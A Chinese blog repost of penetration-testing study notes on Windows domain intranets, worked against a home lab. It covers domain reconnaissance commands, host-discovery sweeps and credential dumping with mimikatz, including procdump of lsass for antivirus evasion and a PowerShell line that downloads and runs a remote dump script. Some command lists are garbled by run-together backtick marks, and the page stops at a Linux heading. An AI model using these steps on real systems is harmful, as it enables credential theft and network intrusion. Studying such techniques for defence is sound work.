<!DOCTYPE html>
<html lang="en">





<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/apple-touch-icon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="心之所向皆是遗憾，目之所及皆是过往">
  <meta name="author" content="2cu">
  <meta name="keywords" content>
  <title>内网笔记 - 2cu的博客</title>

  <link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css">


  <link rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css">


<!-- 主题依赖的图标库，不要自行修改 -->
<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_fmb4a04yx8h.css">

<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_pjno9b9zyxs.css">



<link rel="stylesheet" href="/css/main.css">

<!-- 自定义样式保持在最底部 -->


</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>2cu</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">
              <i class="iconfont icon-home-fill"></i>
              Home</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/archives/">
              <i class="iconfont icon-archive-fill"></i>
              Archives</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/categories/">
              <i class="iconfont icon-category-fill"></i>
              Categories</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/about/">
              <i class="iconfont icon-user-fill"></i>
              About</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/qiangfu/">
              <i class="iconfont icon-tags-fill"></i>
              偶尔看看女神</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/music/">
              <i class="iconfont icon-tags-fill"></i>
              音乐间</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/links/">
              <i class="iconfont icon-link-fill"></i>
              Links</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              
                <div class="mt-3 post-meta">
                  <i class="iconfont icon-date-fill" aria-hidden="true"></i>
                  <time datetime="2020-03-07 00:17">
                    March 7, 2020 am
                  </time>
                </div>
              

              <div class="mt-1">
                
                  
                  <span class="post-meta mr-2">
                    <i class="iconfont icon-chart"></i>
                    7.6k 字
                  </span>
                

                
                  
                  <span class="post-meta mr-2">
                      <i class="iconfont icon-clock-fill"></i>
                    
                    
                    100
                     分钟
                  </span>
                

                
              </div>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <div class="post-content mx-auto" id="post">
            
            <article class="markdown-body">
              <hr>
<p>路漫漫其修远兮</p>
<a id="more"></a>
<p>最近看了一点内网渗透的学习资料，感觉内网渗透需要的知识太多，遂写博客来记录下自己学习内网渗透的一些笔记。</p>
<p>本文转载于：<a href="https://www.cnblogs.com/bmjoker" target="_blank" rel="noopener">https://www.cnblogs.com/bmjoker</a></p>
<p>开篇首先推荐i春秋陈小兵老师在技术沙龙上的分享：<a href="https://www.ichunqiu.com/open/61711" target="_blank" rel="noopener">https://www.ichunqiu.com/open/61711</a></p>
<p>并看大佬的一篇msf内网穿透文章：<a href="https://www.freebuf.com/articles/network/125278.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/network/125278.html</a></p>
<p>其中内网渗透常见的几个问题：</p>
<pre><code class="hljs undefined">1.防火墙穿透
2.木马免杀穿透
3.内网信息收集及目标定位
4.关于文件下载</code></pre>

<p>而内网渗透也分为 域渗透 与 工作组渗透</p>
<p>域渗透：</p>
<pre><code class="hljs undefined">1.域信息收集
2.获取域权限
3.dump域hash
4.内网权限维持</code></pre>

<p>工作组渗透：</p>
<pre><code class="hljs undefined">1.常规内网渗透
2.各种欺骗攻击</code></pre>

<p>如果非要说内网渗透的思路：</p>
<pre><code class="hljs undefined">1.内网环境下先查看网络架构。例如 网段信息 域控 DNS服务器 时间服务器
2.收集到了足够多的信息可以扫一下开放端口 21 22 80 8080 443等确定敏感信息，以及之后渗透的方向
3.通过以上信息进行一定的弱口令尝试，针对特定的软件做banner采集利用，snmp测试读取和写入权限
4.进行一些提权操作，从横向和纵向对目标服务器进行渗透。
6.进行敏感信息挖掘，内网密码收集嗅探，同时擦出入侵足迹。</code></pre>

<p>内网渗透在我感觉一种是拿下内网一台主机权限，外网端口转发或者协议代理进内网，或者通过vpn连接进入内网，另一种是通过物理方法连入内网，比如通过网线，wifi热点进入内网等。不过最终的目的一样，只是连接过程不同，第一种比第二种要多一个”桥梁“。</p>
<p>如何拿下一个网站权限，这里不再多说，各有各的运气，各有各的技术。</p>
<p>具体的端口转发与协议代理可以看我上一篇文章：<a href="https://www.cnblogs.com/bmjoker/p/10264148.html" target="_blank" rel="noopener">https://www.cnblogs.com/bmjoker/p/10264148.html</a></p>
<p>这里主要学习得到一台主机权限后，如何在主机所在内网翻出更大的浪花。</p>
<p>-———————————-</p>
<p>博主在本地搭建了域环境：</p>
<p>DC：windows2008 192.168.0.108</p>
<p>DM：windows2003 192.168.0.107</p>
<p>DM：windows xp 192.168.0.105</p>
<p>-———————————-</p>
<p><strong><em>1\</em></strong>|<strong><em>0**</em></strong>0x01 域信息收集**</p>
<p>-————————–</p>
<p><strong><em>1\</em></strong>|<strong><em>1**</em></strong>1.内网信息探测常用命令**<br><strong><em>1\</em></strong>|<strong><em>2**</em></strong>2.网络环境的判断**<br><strong><em>1\</em></strong>|<strong><em>3**</em></strong>3.内网存活主机探测**<br><strong><em>1\</em></strong>|<strong><em>4**</em></strong>4.hash与明文**</p>
<p>-————————–</p>
<p>1.内网信息探测常用命令</p>
<p>拿下一台内网机器，首先要定位内网机器的架构。</p>
<p>收集基本信息：</p>
<pre><code class="hljs undefined">ipconfig /all        ------ 查询本机IP段，所在域等``net user           ------ 本机用户列表``net localgroup administrators      ------ 本机管理员[通常含有域用户]``net user /domain             ------ 查询域用户``net ``group` `/domain            ------ 查询域里面的工作组``net ``group` `&quot;domain admins&quot;` `/domain    ------ 查询域管理员用户组``net localgroup administrators /domain  ------ 登录本机的域管理员``net localgroup administrators workgroup\user001 /add  ------域用户添加到本机``net ``group` `&quot;domain controllers&quot;` `/domain    ------ 查看域控制器(如果有多台)``net time /domain          ------ 判断主域，主域服务器都做时间服务器``net config workstation       ------ 当前登录域``net session            ------ 查看当前会话``net use \\ip\ipc$ pawword /user:username   ------ 建立IPC会话[空连接-***]``net share             ------ 查看SMB指向的路径[即共享]``net view              ------ 查询同一域内机器列表``net view \\ip           ------ 查询某IP共享``net view /domain          ------ 查询域列表``net view /domain:domainname    ------ 查看workgroup域中计算机列表``net start             ------ 查看当前运行的服务``net accounts            ------ 查看本地密码策略``net accounts /domain        ------ 查看域密码策略``nbtstat –A ip           ------netbios 查询``netstat –an/ano/anb        ------ 网络连接查询``route print            ------ 路由表tasklist /V            ----- 查看进程[显示对应用户]``tasklist /S ip /U domain\username /P /V       ----- 查看远程计算机进程列表``qprocess *             ----- 类似tasklist``qprocess /SERVER:IP        ----- 远程查看计算机进程列表``nslookup –qt-MX Yahoo.com     ----- 查看邮件服务器``whoami /all            ----- 查询当前用户权限等``set`                `----- 查看系统环境变量``systeminfo             ----- 查看系统信息``qwinsta              ----- 查看登录情况``qwinsta /SERVER:IP         ----- 查看远程登录情况``fsutil fsinfo drives        ----- 查看所有盘符``gpupdate /force          ----- 更新域策略cmdkey /l             ----- 看是否保存了登陆凭证。（攻击者会先查看管理员是否保留了登陆凭证，方便后续的凭证抓取。） echo %logonserver%         ----- 查看登陆域</code></pre>

<p><a href="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190129214921605-2074294329.png" target="_blank" rel="noopener"><img src="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190129214921605-2074294329.png" srcset="/img/loading.gif" alt="img"></a></p>
<p><a href="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190129223554983-56718359.png" target="_blank" rel="noopener"><img src="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190129223554983-56718359.png" srcset="/img/loading.gif" alt="img"></a></p>
<p>这里有一个特殊的用户叫做krbtgt，该用户是用于Kerberos身份验证的账户，获得了该用户的hash，就可以伪造票据传递攻击</p>
<p>2.网络环境的判断</p>
<p>1.机器所处位置区域的判断；</p>
<p>2.机器在内网中角色的判断；</p>
<p>3.进出口流量是否连通的判断，是否出的去，进得来</p>
<p>-————————————</p>
<p>(1) 位置的判断</p>
<p>位置判断是指机器处于网络拓扑中的某个区域，是在DMZ区，办公网，还是核心区，核心DB等多个位置，当然这里的区域并不是绝对的，只是大概的一个环境，不同的地方网络环境不一样，区域的界限也不一定明显。</p>
<p>(2) 角色的判断</p>
<p>机器角色的判断指判断已经控制的机器是普通Web服务器、开发测试服务器、公共服务器、文件服务器还是代理服务器、DNS服务器、存储服务器等等。具体的判断是通过对机器内的主机名、文件、网络连接等多种情况进行综合判断的。</p>
<p>(3)连通性的判断</p>
<p>出口流量是否连通的判断指机器是否能上外网这些，要综合判断协议（tcp\http\dns\icmp等协议）与端口(常见能出去的端口有80,8080,443,53,110,123等)。在这里还有一种是网络内网设置了代理服务器的情况，攻击者通常会查看环境变量set，主机名是否有proxy字样的机器，注册表是否有写明代理地址或指定pac代理文件等。</p>
<p>3.内网存活主机探测</p>
<p>icmp扫描</p>
<p>基于icmp的各种内网主机发现方式，如果防火墙过滤的icmp请求，这种方式基本就废了，但是基本上都不会过滤icmp协议的请求。除了本身自带的命令，也可以考虑使用第三方程序，比如cping。</p>
<p>在windows下使用icmp扫描</p>
<ul>
<li>cmd中执行如下命令，对整个C段进行ping扫描</li>
</ul>
<pre><code class="hljs undefined">cmd回显：   for /l %i in (1,1,255) do @ping 192.168.0.%i -w 1 -n 1 | find /i &quot;ttl&quot;
导出成文本： @for /l %i in (1,1,255) do @ping -n 1 -w 40 192.168.0.%i &amp; if errorlevel 1 (echo 192.168.0.%i&gt;&gt;c:\a.txt) else (echo 192.168.0.%i &gt;&gt;c:\b.txt)</code></pre>

<p><a href="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190130200018317-307513884.png" target="_blank" rel="noopener"><img src="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190130200018317-307513884.png" srcset="/img/loading.gif" alt="img"></a></p>
<ul>
<li>利用powershell对目标内网进行icmp扫描</li>
</ul>
<pre><code class="hljs undefined">powershell.exe -exec bypass -Command &quot;Import-Module C:\Invoke-TSPingSweep.ps1;Invoke-TSPingSweep -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort -Port 21,22,23,25,53,80,81,82,83,84,85,86,87,88,89,110,111,143,389,443,445,873,1025,1433,1521,2601,3306,3389,3690,5432,5900,7001,8000,8080,8081,8082,8083,8084,8085,8086,8087,8089,9090,10000&quot;  

目标网段，并非仅限C段，比如你也可以写成这种方式`192.168.0.1 - 192.168.0.254`</code></pre>

<p> windows 2003与windows xp需要安装powershell1.0：<a href="https://support.microsoft.com/zh-cn/help/926140/windows-powershell-1-0-localized-installation-package-for-windows-serv" target="_blank" rel="noopener">官方下载地址</a></p>
<p> 关于powershell在内网渗透中的作用，请看下一篇文章，这里不再细说。</p>
<p>在linux下使用各类icmp扫描</p>
<ul>
<li>shell中执行linux脚本进行扫描</li>
</ul>
<pre><code class="hljs undefined">#!/bin/bash
for ip in 192.168.0.&#123;1..254&#125; 
do 
    ping $ip -c 1 &amp;&gt; /dev/null 
        if [ $? -eq 0 ];then 
            echo $ip is alive .... 
        fi 
done</code></pre>

<p>或者</p>
<pre><code class="hljs undefined">for i in 192.168.0.&#123;1..254&#125;; do if ping -c 3 -w 3 $i &amp;&gt;/dev/null; then echo $i is alived; fi; done</code></pre>

<ul>
<li>nmap的icmp扫描</li>
</ul>
<pre><code class="hljs undefined">nmap -sn -PE 192.168.0.1/24</code></pre>

<p>如果是物理方法连接内网，可直接进行探测。如果仅有一台内网主机权限，可以作端口转发，感觉比较靠谱的还是配置SOCKS5内网代理，使用proxychains配合nmap使用，或者使用msf中的模块先挂内网代理，使用scanner模块进行扫描，或者把内网已getshell的机器配置成跳板机，来借力打力。</p>
<p>arp扫描</p>
<p>在windows下使用arp扫描：</p>
<ul>
<li>arpscan工具扫描</li>
</ul>
<pre><code class="hljs undefined">start /b arpscan.exe -t 192.168.0.1/24 &gt;&gt; result.txt</code></pre>

<p>arpscan.exe下载地址：<a href="https://www.2cto.com/soft/201001/16987.html#download" target="_blank" rel="noopener">https://www.2cto.com/soft/201001/16987.html#download</a></p>
<p>所需dll文件：<a href="https://cn.dll-files.com/" target="_blank" rel="noopener">https://cn.dll-files.com</a></p>
<ul>
<li>powershell调用arpscan扫描</li>
</ul>
<pre><code class="hljs undefined">powershell.exe -exec bypass -Command &quot;Import-Module C:\Invoke-ARPScan.ps1;Invoke-ARPScan -CIDR 192.168.1.0/24&quot;  &gt;&gt; result.txt</code></pre>

<p>在linux下使用arp扫描:</p>
<ul>
<li>nmap的arp扫描</li>
</ul>
<pre><code class="hljs undefined">nmap -sn -PR 192.168.0.1/24  尝试arp扫描</code></pre>

<ul>
<li>netdiscover扫描</li>
</ul>
<pre><code class="hljs undefined">netdiscover -r 192.168.0.1/24 -i eth0</code></pre>

<ul>
<li>msf的arp扫描模块</li>
</ul>
<pre><code class="hljs undefined">msf &gt; use  auxiliary/scanner/discovery/arp_sweep
msf &gt; show options
msf &gt; set  interface eth0
msf &gt; set  smac 00:0c:29:92:fd:85
msf &gt; set  rhosts 192.168.0.1/24
msf &gt; set  threads 20
msf &gt; set  shost 192.168.0.133 (伪造源ip)
msf &gt; run</code></pre>

<ul>
<li>msf获取一个shell</li>
</ul>
<pre><code class="hljs undefined">meterpreter &gt; getsystem     另外,在目标机器上扫描时,务必先提权(个人建议,会方便很多),不然扫描过程中可能会有些问题
meterpreter &gt; run autoroute -s 192.168.0.1/24  (添加路由)
meterpreter &gt; run post/windows/gather/arp_scanner RHOSTS=192.168.0.1/24
meterpreter &gt; run</code></pre>

<p>基于smb和netbios的内网主机发现方式</p>
<p>windows下nbt扫描：</p>
<pre><code class="hljs undefined">nbtscan.exe -m  192.168.0.1/24   非常经典的小工具</code></pre>

<p><a href="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190130211235129-219733840.png" target="_blank" rel="noopener"><img src="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190130211235129-219733840.png" srcset="/img/loading.gif" alt="img"></a></p>
<p>nbtscan.exe工具下载地址：<a href="http://www.unixwiz.net/tools/nbtscan.html#download" target="_blank" rel="noopener">http://www.unixwiz.net/tools/nbtscan.html#download</a></p>
<p>linux下nbt扫描：</p>
<pre><code class="hljs undefined">nbtscan.exe -r  192.168.0.1/24</code></pre>

<p><a href="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190130211600017-1823180637.png" target="_blank" rel="noopener"><img src="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190130211600017-1823180637.png" srcset="/img/loading.gif" alt="img"></a></p>
<p>域内扫描</p>
<pre><code class="hljs undefined">net view
dsquery computer  其实,域内最好用的也就是nbtscan了</code></pre>

<p><a href="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190130211851318-2060640176.png" target="_blank" rel="noopener"><img src="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190130211851318-2060640176.png" srcset="/img/loading.gif" alt="img"></a></p>
<p>如果计算机名很多的时候，可以利用bat批量ping获取ip</p>
<pre><code class="hljs undefined">@echo off
setlocal ENABLEDELAYEDEXPANSION
@FOR /F &quot;usebackq eol=- skip=1 delims=\&quot; %%j IN (`net view ^| find &quot;命令成功完成&quot; /v ^|find &quot;The command completed successfully.&quot; /v`) DO (
@FOR /F &quot;usebackq delims=&quot; %%i IN (`@ping -n 1 -4 %%j ^| findstr &quot;Pinging&quot;`) DO (
@FOR /F &quot;usebackq tokens=2 delims=[]&quot; %%k IN (`echo %%i`) DO (echo %%k  %%j)
)
)</code></pre>

<p>4.hash与明文</p>
<p>抓取hash最好的工具莫过于mimikatz，不过免杀是个问题。</p>
<p>从 sam 数据库中提取目标系统本地用户密码 hash</p>
<ul>
<li>在线读取sam数据库</li>
</ul>
<p>(1) 使用mimikatz提取系统hash与明文</p>
<pre><code class="hljs undefined">privilege::debug
token::elevate
lsadump::sam
sekurlsa::logonPasswords  (获取明文用户口令）</code></pre>

<p><a href="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190131151824165-907488630.png" target="_blank" rel="noopener"><img src="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190131151824165-907488630.png" srcset="/img/loading.gif" alt="img"></a></p>
<p>破解出的NTLM可以尝试CMD5破解：</p>
<p><a href="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190131153220198-9152151.png" target="_blank" rel="noopener"><img src="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190131153220198-9152151.png" srcset="/img/loading.gif" alt="img"></a></p>
<p>或者尝试 ophcrack 破解：<a href="https://www.objectif-securite.ch/ophcrack.php" target="_blank" rel="noopener">https://www.objectif-securite.ch/ophcrack.php</a></p>
<p>简单密码可以直接明文显示</p>
<p><a href="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190131153032527-1803063888.png" target="_blank" rel="noopener"><img src="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190131153032527-1803063888.png" srcset="/img/loading.gif" alt="img"></a></p>
<p>(2) 使用pwdump7提取系统密码hash</p>
<p>下载地址：<a href="http://passwords.openwall.net/b/pwdump/pwdump7.zip" target="_blank" rel="noopener">http://passwords.openwall.net/b/pwdump/pwdump7.zip</a></p>
<p>需要管理员权限执行：</p>
<p><a href="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190131153826223-715246260.png" target="_blank" rel="noopener"><img src="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190131153826223-715246260.png" srcset="/img/loading.gif" alt="img"></a></p>
<p>可以看到已经提取出hash</p>
<p>(3) 使用powershell脚本提取hash</p>
<p>hash脚本下载地址：<a href="https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-PowerDump.ps1" target="_blank" rel="noopener">https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-PowerDump.ps1</a></p>
<p>管理员权限执行powershell命令：</p>
<pre><code class="hljs undefined">powershell -ep bypass -f Invoke-PowerDump.ps1</code></pre>

<ul>
<li>离线读取 sam 数据库</li>
</ul>
<p>获取当前系统的 sam 数据库文件，在另一个系统下读取</p>
<p>导出 sam 数据库文件有以下两种实现方法：</p>
<p>(1) 保存注册表</p>
<p>管理员权限，利用 reg 将 sam，system和 security文件导出来，并保存在本地：</p>
<pre><code class="hljs undefined">reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save HKLM\SECURITY sercrity.hiv
mimikatz.exe &quot;lsadump::sam /system:system.hiv /sam:sam.hiv /sercrity:sercrity.hiv&quot; exit</code></pre>

<p><a href="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190131161316851-1987021747.png" target="_blank" rel="noopener"><img src="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190131161316851-1987021747.png" srcset="/img/loading.gif" alt="img"></a></p>
<p>可以看到已提取出hash</p>
<p>参考链接：<a href="https://3gstudent.github.io/3gstudent.github.io/渗透技巧-通过SAM数据库获得本地用户hash/" target="_blank" rel="noopener">通过SAM数据库获得本地用户hash</a></p>
<p>通过 dump lsass.exe 进程数据离线免杀抓取明文</p>
<p>(1) 通过procdump.exe提取出明文</p>
<p>procdump.exe工具下载地址：<a href="https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump" target="_blank" rel="noopener">https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump</a></p>
<p>有时遇到杀软，直接在目标机器上抓取密码可能会被杀，这时可以先利用 procdump 把 lsass.exe 进程中的数据导出到指定文件中，再把导出的文件下回到本地用 mimikatz 读取文件中的密码hash，以实现免杀效果，不过需要注意的是，本地读取文件的系统平台和目标的系统需要完全一致。</p>
<p>先在目标机器上执行：</p>
<pre><code class="hljs undefined">32位机器：procdump.exe -accepteula -ma lsass.exe lsass.dmp    
64位机器：procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp</code></pre>

<p><a href="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190131163106160-903443717.png" target="_blank" rel="noopener"><img src="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190131163106160-903443717.png" srcset="/img/loading.gif" alt="img"></a></p>
<p>本地使用mimikatz读取文件中的密码hash</p>
<pre><code class="hljs undefined">mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full</code></pre>

<p><a href="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190131163257866-2002614982.png" target="_blank" rel="noopener"><img src="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190131163257866-2002614982.png" srcset="/img/loading.gif" alt="img"></a></p>
<p>可以看到已经提取出系统中的hash与明文</p>
<p>(2) powershell调用dump脚本</p>
<pre><code class="hljs undefined"># Public&gt;powershell IEX (New-Object Net.WebClient).DownloadString(&apos;https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1&apos;);&quot;Get-Process lsass | Out-Minidump&quot;
或者本机执行
# Public&gt;powershell –exec bypass –Command &quot;&amp; &#123;Import-Module &apos;C:\Users\Public\Out-Minidump.ps1&apos;; Get-Process lsass | Out-Minidump&#125;&quot;</code></pre>

<p>关于windows10/2012r2 以后系统的明文密码抓取方式</p>
<p>在windows10/2012r2 之后的系统版本中，默认情况下是禁用了在内存缓存中存储系统用户明文密码，此时使用mimikatz去抓取密码，会显示null。</p>
<p>解决方法为：修改注册表 —&gt; <a href="http://www.ansbase5.info/?p=136" target="_blank" rel="noopener">抓取windows server 2012 &amp; 2016 &amp; win8明文密码</a></p>
<p><strong><em>2\</em></strong>|<strong><em>0**</em></strong>0x02 横向渗透**</p>
<p>-————————</p>
<p>1.默认权限配置认知</p>
<p>2.端口转发与协议代理</p>
<p>3.工作组横向渗透</p>
<p>4.域环境横向渗透</p>
<p>5.权限维持</p>
<p>-————————</p>
<p>1.默认权限配置认知</p>
<pre><code class="hljs undefined">[+]普通机器
允许Console：administrator组（domain admins），users组（domain users），backup operators组
允许rdp：administrator组（domain admins），Remote desktop users组

[+]域控AD
允许Console：administrator组，backup operators组，account operators组，print operators组，server operators组
允许rdp：administrator组，Remote desktop users组</code></pre>

<p>如果出现配置错误，属于权限设置问题。</p>
<p>当某些普通\不普通用户加入AD的rdp组或其他管理组，当攻击者拿到这些用户的权限时就相当于可以获取到域控制器的权限了。</p>
<p>2.代理转发与协议代理</p>
<p>具体请参考我上一篇文章：<a href="https://www.cnblogs.com/bmjoker/p/10264148.html" target="_blank" rel="noopener">内网渗透之端口转发</a></p>
<p>3.工作组横向渗透</p>
<p>工作组采取的一般都是常规渗透方法，因为工作组一般都是个人和少数服务器。</p>
<p>通常使用的方法有：</p>
<ul>
<li>扫描网段中的web服务，常用的有phpstudy，wampserver等，来寻找搭建的服务漏洞</li>
<li>扫描开放端口信息，以及对应的服务，判断是否存在漏洞。</li>
<li>扫描主机由于没有更新到最新版本导致的系统漏洞，比如MS17-010，补丁号为KB4013389</li>
<li>hash抓取，hash注入，hash碰撞，IPC登陆，未授权访问，文件共享系统。</li>
<li>ARP嗅探/欺骗攻击（Cain和Ettercap）</li>
<li>DNS劫持，会话劫持。</li>
<li>社会工程学</li>
<li>…</li>
</ul>
<p>4.域环境横向渗透</p>
<p>(1)域内信息探测</p>
<p>windows环境常用命令：</p>
<pre><code class="hljs undefined">net user /domain    #查看域用户``net view /domain    #查看有几个域``net view /domain:XXX  #查看此域内电脑``net ``group` `/domain   #查询域里面的组``net ``group` `&quot;domain computers&quot;` `/domain #查看加入到域内的所有计算机名``net ``group` `&quot;domain admins&quot;` `/domain   #查看域管理员``nltest /dclist:xxx   #查看域控制器``net ``group` `&quot;domain controllers&quot;` `/domain  #查看域控制器``net user hacker /domain   #获得指定账户的详细信息``net accounts /domain    #获得域密码策略设置，密码长短，错误锁定等信息</code></pre>

<p> dsquery命令探测AD信息：</p>
<pre><code class="hljs undefined">dsquery computer    ----- 寻找目录中的计算机``dsquery contact    ----- 在目录中查找与指定的搜索条件相匹配的联系人``dsquery subnet     ----- 寻找目录中的子网``dsquery ``group`     `----- 寻找目录中的群组``dsquery ou       ----- 寻找目录中的组织单位``dsquery site      ----- 寻找目录中的站点``dsquery server     ----- 寻找目录中的域控制器``dsquery user      ----- 寻找目录中的用户``dsquery quota     ----- 寻找目录中的配额规格``dsquery partition   ----- 寻找目录中的磁盘分区``dsquery *       ----- 使用标准的LDAP查询在目录中寻找任何对象``dsquery server –domain Yahoo.com | dsget server–dnsname –site  ---搜索域内域控制器的DNS主机名和站点名``dsquery computer domainroot –name *-xp –limit 10        ----- 搜索域内以-xp结尾的机器10台``dsquery user domainroot –name admin* -limit           ---- 搜索域内以admin开头的用户10个``……``……``[注:dsquery来源于Windows Server 2003 Administration Tools Pack]具体参考：http:``//blog.51cto.com/122269875/1716414</code></pre>

<p><a href="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190129214829896-1797555095.png" target="_blank" rel="noopener"><img src="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190129214829896-1797555095.png" srcset="/img/loading.gif" alt="img"></a></p>
<p><a href="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190129215417848-1780114464.png" target="_blank" rel="noopener"><img src="https://img2018.cnblogs.com/blog/1344396/201901/1344396-20190129215417848-1780114464.png" srcset="/img/loading.gif" alt="img"></a></p>
<p>Net系列命令获取域内信息</p>
<pre><code class="hljs undefined">Csvde/ldifde/dsquery/adfind/ldapsearch  #探测更详细信息``使用`Get-SPN`（powershell脚本LDAP中快速查询符合指定得用户、组、或者SPN服务名称）``Nslookup -type=SRV_ldap._tcp  #(寻找域控)``tasklist /v   #列出进程和进程所有者（看是否有域管登陆）``PowerView    #（powershell脚本 辅助找寻定位关键用户，查看域管在线机器）``WinScanX.exe  #远程信息刺探``Winfo.exe    #遍历远程用户名``nmap smb-``enum``-sessions.nse  #（引擎来获取远程机器的登陆session，并且不需要管理权。）``netview.exe   #(它利用`NetSessionEnum`来寻找登陆sessions，利用`NetShareEnum`来找寻共享，利用`NetWkstaUserEnum`来枚举登陆的用户)</code></pre>

<p>Wmic系列命令使用：</p>
<pre><code class="hljs undefined">wmic bios            ----- 查看bios信息``wmic qfe            ----- 查看补丁信息``wmic qfe ``get` `hotfixid      ----- 查看补丁-Patch号``wmic startup          ----- 查看启动项``wmic service          ----- 查看服务``wmic os             ----- 查看OS信息``wmic process ``get` `caption,executablepath,commandline``wmic process call create “process_name” (executes a program)``wmic process ``where` `name=”process_name” call terminate (terminates program)``wmic logicaldisk ``where` `drivetype=3 ``get` `name, freespace, systemname, filesystem, size,``volumeserialnumber (hard drive information)``wmic useraccount (usernames, sid, and various security related goodies)``wmic useraccount ``get` `/ALL``wmic share ``get` `/ALL (you can use ? ``for` `gets help ! )``wmic startup list full (``this` `can be a huge list!!!)``wmic /node:``&quot;hostname&quot;` `bios ``get` `serialnumber (``this` `can be great ``for` `finding warranty info about target)</code></pre>

<p>linux常用命令：</p>
